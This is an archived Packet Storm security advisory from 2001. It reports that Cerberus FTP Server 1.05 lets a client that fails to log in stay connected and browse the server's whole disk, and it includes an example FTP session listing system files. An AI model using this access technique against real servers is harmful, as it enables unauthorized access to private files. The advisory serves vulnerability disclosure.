what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

cerberus.ftp.txt

cerberus.ftp.txt
Posted Apr 30, 2001
Authored by Andris K

Andrisk Security Advisory 2# - Cerberus FTP Server 1.05 for Windows 9x/NT allows remote users without accounts to view any file on the server.

tags | exploit, remote
systems | windows
SHA-256 | ac36f5c4f40ea379968ee64d982cb79cad04d53d8808bf71cd2833ea937ccc41
Download | Favorite | View

cerberus.ftp.txt

Change Mirror Download
Andrisk Security Advisory  2# - Cerberus FTP Server 1.05

Topic: Cerberus FTP Server 1.05
Announced: 2001-04-25
Affects: Cerberus FTP Server 1.05
OS : Win9x/NT

I. Problem Description
**********************
Cerberus FTP Server 1.05 is an FTP server for Windows 9x/NT. A bug 
allows view any files from remote computer.

II. Impact
**************
When any user try to login with username that is not specified (or wrong) ftp server alowes : 
1. Remote client stay conected
2 .Remote client can view all files and browse directories of the remote computer 

Example 1:
--------
220-Welcome to Cerberus FTP Server
220 Created by Grant Averett
Name (IP:root): aaaaaaaaa
530 Unknown user
ftp: Login failed.
Remote system type is WindowsNT.
ftp> ls
200 Port command received
150 Opening data connection
d---rwxrwx  1 100 84 0 Apr 29 2001 !!
----rwxrwx  1 100 84 0 Nov 22 2000 AUTOEXEC.BAT
-r--rwxrwx  1 100 84 289 Dec 25 2000 boot.ini
-r--rwxrwx  1 100 84 36 Nov 22 2000 CONFIG.SYS
-r--rwxrwx  1 100 84 4717 Jan 31 2001 ffastun.ffa
-r--rwxrwx  1 100 84 2113536 Jan 31 2001 ffastun.ffl
-r--rwxrwx  1 100 84 417792 Jan 31 2001 ffastun.ffo
-r--rwxrwx  1 100 84 3620864 Jan 31 2001 ffastun0.ffx
dr--rwxrwx  1 100 84 0 Apr 30 2001 ftproot
-r--rwxrwx  1 100 84 0 Oct 01 2000 IO.SYS
dr--rwxrwx  1 100 84 0 Apr 30 2001 mirc
-r--rwxrwx  1 100 84 0 Oct 01 2000 MSDOS.SYS
-r--rwxrwx  1 100 84 26816 Oct 01 2000 NTDETECT.COM
-r--rwxrwx  1 100 84 156496 Oct 01 2000 ntldr
-r--rwxrwx  1 100 84 579 Oct 28 2000 os240905.bin
-r--rwxrwx  1 100 84 578 Nov 16 2000 os560179.bin
-r--rwxrwx  1 100 84 163811328 Apr 27 2001 pagefile.sys
dr--rwxrwx  1 100 84 0 Apr 29 2001 Program Files
dr--rwxrwx  1 100 84 0 Apr 30 2001 rc5
dr--rwxrwx  1 100 84 0 Apr 19 2001 RECYCLER
dr--rwxrwx  1 100 84 0 Apr 30 2001 TEMP
dr--rwxrwx  1 100 84 0 Apr 29 2001 WINNT
-r--rwxrwx  1 100 84 1375 Apr 29 2001 winzip.log
226 Transfer complete
ftp> 

III. Solution
*************
At this time, no patch is available yet.

IV. Credits
***********
Bug discovered by Andris K <andris@talsi.teliamtc.lv>

Greets: Mareks M, Dreef (www.lam.yo.lv), coolynx, ParaTr00p

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    38 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close